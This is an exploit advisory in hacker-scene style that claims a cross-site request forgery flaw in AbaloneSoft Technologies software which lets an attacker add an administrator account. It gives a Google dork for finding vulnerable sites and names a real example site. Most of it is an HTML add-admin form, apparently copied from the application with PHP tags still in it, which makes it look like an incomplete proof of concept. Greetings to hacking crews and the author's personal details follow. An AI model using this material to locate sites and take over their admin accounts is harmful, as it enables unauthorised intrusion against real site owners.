###
# Title : AbaloneSoft Technologies CSRF Vulnerability (Add Admin)
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# Download : http://www.yuvajobs.com/download-Abalonesoft+Technologies-placement-papers
# platform : php
# Impact : Add Admin
# Tested on : Windows XP sp3 FR 
###
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
###
# Go0gle Dork : " Powered by  AbaloneSoft Technologies "
###


# Demo : http://[Target]/[Path]/html/admin/add_admin.html

# Example : http://www.odolyss.com/html/admin/add_admin.html

==================[ HTML CODE ]====================

***************************************************


<script language="javascript" type="text/javascript" src="http://[LocalHost]/../js/admin/checkadmin.js"></script>

<form id="add_admin" name="add_admin" method="post" action="add_admin.php">

    <td width=100% height="100%"  valign=top>
	  <table width="100%" height="50%" class="innertable" border="0" align="center" cellpadding="1" cellspacing="1">
		 <tr colfont="4"  height=10><td></td></tr>
		 <tr>
		   <td valign="top">
		
			
		  
			 <table width="100%" border="0" cellspacing="0" cellpadding="0">

					   <tr>
					   <td width="1%" valign="top" style="padding-left:5px;">				   </td>
					   <TD width="99%" valign="top"  style="padding-left:10px;" align="top" >
						 <table width="100%" border="0" cellspacing="1" cellpadding="0" vspace="0"  class="border"  align="center"  >
<tr>
  <td  valign="top"><table width="100%" border="0" cellspacing="1" cellpadding="0"  >
    <!--<tr>      <td align="center" height="5"  colspan="2">&nbsp;</td>    </tr>-->
    <tr >
      <td colspan="3" height="19"  style="padding-left:5px" class="tdbg">Add User </td>

    </tr>
    <tr>
      <td align="center" height="5"  colspan="3">&nbsp;</td>
    </tr>
    <tr>
      <td height="1" colspan="3" class="blacktext" ></td>
    </tr>
    <tr >
      <td height="10" colspan="3" valign="middle" class="normal_text"><span class="asterisk">*  Field is mandatory</span></td>

    </tr>
    <!--<tr>
     <td width="50%" colspan="2" class="normal_text" align="left" style="padding-bottom:5px; padding-left:300px;"><font color="#E66F17"><?=$msg?> </font></td>
   </tr>-->
    <tr>
      <td height="41" colspan="3" style="padding-left:400px" class="error_text"><?=$msg_admin?><?=$errorMessage;?>
          <?=$oldperror?></td>
    </tr>
    <tr>
      <td width="50%"  align="right" class="normal_text" style="left:200px"> User Name : </td>

      <td width="25%"><input name="txtuser" type="text" id="txtuser" regexp="JSVAL_RX_FC" value="<?= $adminName; ?>" required=1 err="Please enter admin name." class="textbox1" />
          <font color="#FF0000">*</font>
          <!-- <span class="catagories">*</span>-->
          <input name="adminid" type="hidden" value="<?=$id?>" /></td>
      <td width="25%"><div id="erruser" name="erruser"  class="error_text"></div></td>
    </tr>
    <tr>
      <td height="31" align="right" class="normal_text">New Password : </td>

      <td><input type="password" name="txtnpass" id="txtnpass" required="1" err="Please enter new password." regexp="JSVAL_RX_PS"class="textbox1"/>
          <font color="#FF0000">*</font>
          <!--<span class="catagories">&nbsp;*</span>--></td>
      <td><div id="errpass" name="errpass"  class="error_text"></div></td>
    </tr>
    <tr>
      <td height="31" align="right" class="normal_text">Conform Password : </td>
      <td><input type="password" name="txt_cpass"  minlength="5" required="1" err="Please enter valid password." regexp="JSVAL_RX_PS"  class="textbox1" id="txt_cpass" />

          <font color="#FF0000">*</font>
          <!--<span class="catagories">&nbsp;*</span>--></td>
      <td><div id="errcpass" name="errcpass"  class="error_text"></div></td>
    </tr>
    <tr>
      <td align="right" class="normal_text">E-mail ID : </td>
      <td><input name="txt_email" type="text" id="txt_email" class="textbox1" value="<?= $adminMail?>" required=1 err="Please enter valid e-mail address." regexp="JSVAL_RX_NEWEMAIL" />
          <font color="#FF0000">*</font>

          <!--<span class="catagories">&nbsp;*</span>--></td>
      <td><div id="errmail" name="errmail"  class="error_text"></div></td>
    </tr>
    <tr>
      <td height="5"></td>
    </tr>
    <tr>
      <td align="right"><input type="hidden" name="Submit" value="Submit" /></td>
      <td colspan="2" style="padding-left:25px;"><input type="button"  class="button" name="Submit" value="Submit" onclick="allval();" /></td>

    </tr>
    <tr>
      <td height="7"></td>
    </tr>
  </table></td>
</tr>
</table>
</TD></tr></table>
<!------------------- content end here ----------------------->
</td></tr></table>
</form>
</td>
</tr>
</td>
</tr>
</table>

#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
# Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX 
# Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# [ Special Greets to 3 em EnGineering Electric Class , BACALORIA 2011 Enchallah 
# Messas Secondary School - Ain mlilla - 04300 - Algeria ] ,
# Greets All Bad Boys (cité 1850 logts - HassiMessaouD - 30008 -Algeria ) ,
# hotturks.org : TeX * KadaVra ... all Others
# Kelvin.Xgr ( kelvinx.net)
#===========================================================================